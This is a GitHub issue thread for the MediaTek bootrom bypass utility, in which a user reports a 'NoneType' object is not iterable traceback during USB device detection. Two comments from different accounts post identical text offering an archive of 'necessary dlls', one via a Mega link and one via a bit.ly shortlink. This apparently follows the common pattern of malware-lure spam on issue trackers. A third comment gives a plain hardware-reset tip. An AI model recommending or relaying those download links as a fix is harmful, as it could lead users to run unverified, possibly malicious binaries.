### ISSUE TITLE
'NoneType' object is not iterable

### ISSUE THREAD

**Issue by korzenroot** [MTK-bypass/bypass_utility#126]
C:\Users\Rysiu\Desktop\bypass>python main.py -c mt6765_config.json5 -p mt6765_payload.bin
[2024-09-19 12:05:52.317521] Waiting for device
[2024-09-19 12:09:51.172192] Found device = 0e8d:20ff
Traceback (most recent call last):
  File "C:\Users\Rysiu\Desktop\bypass\main.py", line 237, in <module>
    main()
  File "C:\Users\Rysiu\Desktop\bypass\main.py", line 40, in main
    device = Device().find()
  File "C:\Users\Rysiu\Desktop\bypass\src\device.py", line 109, in find
    self.ep_in = usb.util.find_descriptor(cdc_if, custom_match=lambda x: usb.util.endpoint_direction(x.bEndpointAddress) == usb.util.ENDPOINT_IN)
  File "C:\Users\Rysiu\AppData\Local\Programs\Python\Python39\lib\site-packages\usb\util.py", line 192, in find_descriptor
    return _interop._next(desc_iter(**args))
  File "C:\Users\Rysiu\AppData\Local\Programs\Python\Python39\lib\site-packages\usb\_interop.py", line 68, in _next
    return next(iter)
  File "C:\Users\Rysiu\AppData\Local\Programs\Python\Python39\lib\site-packages\usb\util.py", line 183, in desc_iter
    for d in desc:
TypeError: 'NoneType' object is not iterable

C:\Users\Rysiu\Desktop\bypass>
pls help

**Comment by Andrez092** [comment]
try this
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
I put the necessary dlls in the archive

**Comment by KERERCVASD** [comment]
try this
https://bit.ly/4evXrQ6
I put the necessary dlls in the archive

**Comment by waayaa** [comment]
disconnect usb, power off phone. run main.py then vol + & - & plug usb
